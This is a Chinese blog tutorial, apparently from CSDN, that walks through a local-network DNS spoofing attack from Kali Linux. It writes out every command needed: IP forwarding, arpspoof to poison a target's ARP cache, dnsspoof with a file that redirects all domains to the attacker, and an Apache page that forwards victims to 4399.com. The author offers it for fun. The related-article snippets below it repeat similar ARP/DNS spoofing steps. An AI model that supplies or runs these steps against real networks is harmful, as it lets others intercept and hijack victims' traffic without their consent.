通过arpspoof,dnsspoof和Apache2进行DNS欺骗进行转发,例:转发到4399

最新推荐文章于 2024-05-25 09:41:54 发布
最新推荐文章于 2024-05-25 09:41:54 发布
阅读量375 收藏 2
点赞数 1
文章标签: 网络 linux 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_47077502/article/details/130169732
版权

首先先输入su进入root用户然后开启转发

echo 1 >/proc/sys/net/ipv4/ip_forward

看看是否开启成功,返回1为成功

cat /proc/sys/net/ipv4/ip_forward

下载dnsspoof工具

apt-get install dsniff

从查看自己的ip和目标的ip

 

用kali的网关ip进行攻击

arpspoof -i eth0 -t 192.168.17.1 192.168.17.130

效果图

然后再写一个dns.txt

leafpad dns.txt
或者
vim dns.txt
哪个用着舒服用哪个,没有就apt install 应用包名安一下,如果用vim的话
先点键盘上的i键进入编辑模式,写好之后按esc,再按冒号,再输入wq就可以完成保存并退出

 dns.txt内容如下,把所有的网址都转到192.168.17.128里

 紧接着输入下面的命令就可以转发页面了,记得su进入root用户后再执行

dnsspoof -i eth0 -f /home/kali/dns.txt

下面再讲一下如何转发到你想要的页面,输入下面这行代码进入apacge2的配置页面

sudo vim /etc/apache2/sites-available/000-default.conf

然后打开之后添加下面的语句

ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
DocumentRoot后面的是你想要的配置文件路径

 效果是这样的

然后我们再在这个目录下新建一个html文件,名字随便起,内容如下 

<meta http-equiv="refresh" content="0;url=https://www.4399.com/" >
content后面的0是指响应时间,就是你想要多长时间再跳转页面,我这里想直接跳转,就是0,默认单位是秒
然后url就放你想要跳转的页面

保存退出后,我们启动apache2服务

sudo systemctl start apache2    //开启apache2服务
sudo systemctl stop apache2     //停止apache2服务
sudo systemctl restart apache2  //重启apache2服务

然后这个时候再重新执行下攻击命令

dnsspoof -i eth0 -f /home/kali/dns.txt  
记得也要先su进入root用户再执行

运行成功了,我们去目标机上试一下

 

 

成功了,不过对于https开头的网址是没办法替换的,大家娱乐一下就好啦 

子虚乌有x
关注
dnsspoof工作原理、编译、源码分析
09-07 2664
dnsspoof 是一个DNS欺骗工具,只要给出将要重定向的域名和域名重定向到的IP,就可以实现DNS欺骗。 下载地址:http://monkey.org/~dugsong/dsniff/ dnsspoof是dsniff工具集中的一个。 dnsspoof依赖2个三方库:li
ARP欺骗+DNS欺骗
热门推荐
嘻嘻哈哈
01-24 1万+
一、共享网络与交换网络的区别 1、共享网络 在共享网络中,由于HUB属于一层设备,对于到达本身的数据报文,HUB会对报文进行广播(除了收到报文的那个接口),因此接在同HUB的所有PC都能收到该报文。前提PC开启了混杂模式 注: 通常情况下,网卡都是工作在非混杂模式,也就是说即使收到数据报文,网卡会判断目的MAC是否和自己的一样,不一样的话代表数据包不是给自己的,因此会丢弃,只
DNS欺骗arpspoof&dnsspoof
田一柠的博客
12-05 1805
#################################################################################################################### echo 1 >/proc/sys/net/ipv4/ip_forward 开启转发,否则目标会断网。1为开启转发,0为关闭转发。 cat /proc/sys/net/ipv4/ip_forward 查看转发是否成功? apt-get inst...
arpspoof dnsspoof中间人攻击
weixin_30823683的博客
09-21 767
最近搞了一个监听神器,尽管使用了网卡混杂模式,不过监听到的几乎全是本地流量, 为了获取更多有用的数据,搞一下中间人攻击,最基本的就是arpspoof + IP转发,这样就可以获得局域网内任何人的上网流量, 难得的是实验室没有做ARP防护,给arpspoof一个大行其道的机会。 arpspoof 实战环境 攻击者(kali linux):10.10.10.1 攻击目标:1...
DNS劫持
weixin_45597678的博客
11-19 4642
文章目录原理实操复现防御 原理 DNS的全称为Domain Name Server也就是域名服务,在真实环境中我们人是很难记住一串没有规律的ip地址的,所以引入了域名方便人们的记忆和访问但是数据包在网络的传输是以ip地址来寻址的,这就导致需要一种服务来提供从域名到ip的转换,而DNS就是这样一种服务。 这里再介绍一下访问一个网址的时候解析域名会经过哪些步骤吧: 首先会访问我们的本地DNS缓存查看是否有该域名的一个解析记录有的话会取该记录的映射ip进行发送数据包 如果本地DNS缓存没有该域名的解析记录的话,
开源项目推荐:dnsspoof - 网络嗅探与DNS欺骗工具
最新发布
gitblog_00008的博客
05-25 395
开源项目推荐:dnsspoof - 网络嗅探与DNS欺骗工具 项目地址:https://gitcode.com/DanMcInerney/dnsspoof 项目介绍 dnsspoof 是一个轻量级的Python程序,用于进行DNS(域名系统)欺骗。它可以在数据包到达路由器之前拦截DNS响应,并将其替换为伪造的DNS响应。这个项目由Dan McInerney于2013年创建并发布,旨在提供一种简单易...
Kali 局域网 DNS 劫持
qq_56724121的博客
04-23 942
Kali 局域网 DNS 劫持 1. 将kali XP 桥接到物理的无线网卡并且互通 2. 修改 errtercap 的配置文件 => vim /etc/ettercap/etter.dns 3. 启动Apache服务器 service apache2 start 4. 启动 ettercap 图像化界面 => ettercap -G 5.ettercap进行接口设置 ettercap进行攻击目标设置 将扫描到的地址 网关加入t...
中间人攻击的实践与原理(ARP毒化、DNS欺骗
hello_mumu的博客
02-25 2082
一、共享网络与交换网络的区别 1、共享网络 在共享网络中,由于HUB属于一层设备,对于到达本身的数据报文,HUB会对报文进行广播(除了收到报文的那个接口),因此接在同HUB的所有PC都能收到该报文。前提PC开启了混杂模式 注: 通常情况下,网卡都是工作在非混杂模式,也就是说即使收到数据报文,网卡会判断目的MAC是否和自己的一样,不一样的话代表数据包不是给自己的,因此...
网络基础:ARP欺骗+DNS欺骗
G6_12的博客
06-17 866
ARP欺骗+DNS欺骗简单过程
嗅探工具 --- wireshark、tcpdump、dsniff、ettercap、bettercap、netsniff-ng
墨鱼菜鸡
07-11 4959
最好的 MitM 中间人攻击开源框架清单:https://github.com/Chan9390/Awesome-MitM 哔哩哔哩:https://search.bilibili.com/all?keyword=wireshark 1、WireShark WireShark 是一个开源免费的高性能网络协议分析软件,它的前身就是非常著名的网络分析软...
WinDNSSpoof DNS漏洞利用工具
09-22
常见的windows DNS漏洞利用工具,小巧好用的一款工具。
arpspoof and dnsspoof
THMAIL的博客
08-01 1056
最近搞了一个监听神器,尽管使用了网卡混杂模式,不过监听到的几乎全是本地流量, 为了获取更多有用的数据,搞一下中间人攻击,最基本的就是arpspoof + IP转发,这样就可以获得局域网内任何人的上网流量, 难得的是实验室没有做ARP防护,给arpspoof一个大行其道的机会。 arpspoof 实战环境 攻击者(kali linux):10.10.10.1 攻击目标:10.10.10.2 默认网关:10.10.10.254 攻击步骤 首先在本地开启IP转发,否则很容易被发觉。 echo 1» .
wifipineapple执行dnsspoof
dianyan5615的博客
01-24 256
  ssh连接到wifipineapple: 输入连接信息:ssh root@172.16.42.1 输入密码:pineapplesareyummy   安装依赖基本环境: opkg update opkg install nan opkg install htop opkg install bash opkg install netcat opk...
DNS欺骗攻击技术详解及实战代码解析
正在成为 code ape
03-11 2034
DNS(Domain Name System)欺骗是常见的网络攻击手段。本文详细解析如何利用Scapy库实现ARP欺骗DNS欺骗,并进行实际操作。
局域网下的DNS欺骗复现
Atkx's Blog
03-14 1054
这里写自定义目录标题环境复现 环境 攻击机:kali linux 192.168.182.130 靶 机:win7x64位 192.168.182.13 网关:192.168.182.2 复现 查看网关 route -n ip route show netstat -r 网关为192.168.182.2 ┌──(kali㉿kali)-[~/桌面] └─$ route -n Kernel IP routing table Destination Gateway Genm
DNS缓存(DNS劫持)攻击过程演示
安全命令
08-01 2771
DNS缓存攻击原理 DNS缓存攻击是通过欺骗域名服务器的缓存条目(即:域名到ip地址的映射)。当目标计算机访问被欺骗的域名时,会把域名转发到一个被我们伪装的站点下。而访问者却并不知道访问的是一个假网站。 当计算机要访问本地或者Internet上的站点时,操作系统首先需要知道该站点的确切IP。但是记住ip是一件困难的事情,所以基本上每个站点都有一个域名。而计算机去访问站点的时候如果拿到的是域名,那么去寻找网络中的一台DNS 服务器,通过该域名服务器提供的域名解析服务将域名转换为真实的ip地址再进行访问大概的流
ARP欺骗的各种玩法】嗅探流量、限速、断网操作
jennycisp的博客
12-11 1835
ARP欺骗(英语:ARP spoofing),又称ARP毒化(ARP poisoning,网络上多译为ARP病毒)或ARP攻击,是针对以太网地址解析协议(ARP)的一种攻击技术,通过欺骗局域网内访问者PC的网关MAC地址,使访问者PC错以为攻击者更改后的MAC地址是网关的MAC,导致网络不通。此种攻击可让攻击者获取局域网上的数据包甚至可篡改数据包,且可让网络上特定计算机或所有计算机无法正常连线。
从零开始搭建Fake AP
weixin_34342207的博客
09-13 321
本文讲的是从零开始搭建Fake AP,使用的工具: · hostapd(或airbase-ng) · dnsmasq(或isc-dhcp-server) · Apache2 · Nano或Vim · grep 简介 Hostapd 要创建一个特定类型的接入点,无论是开放,WPA2个人,企业或业力攻击。 dnsmasq 轻量级DNS / DHCP服务器。...
基于内网dns劫持与网页挂马实测案
qq_36585338的博客
11-26 2120
关于dns劫持与flush钓鱼挂马的一次真实案复现,其中包括cs打枪神器的使用测试
使用arpspoof进行ARP欺骗截取内网流量与DNS Spoof
如,`arpspoof -i eth0 -t 192.168.31.91 192.168.31.1`命令表示在eth0接口上,针对目标IP 192.168.31.91(受害主机)和网关IP 192.168.31.1进行ARP欺骗。 3. **使用dsniff嗅探已知协议的账号和密码**:dsniff是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值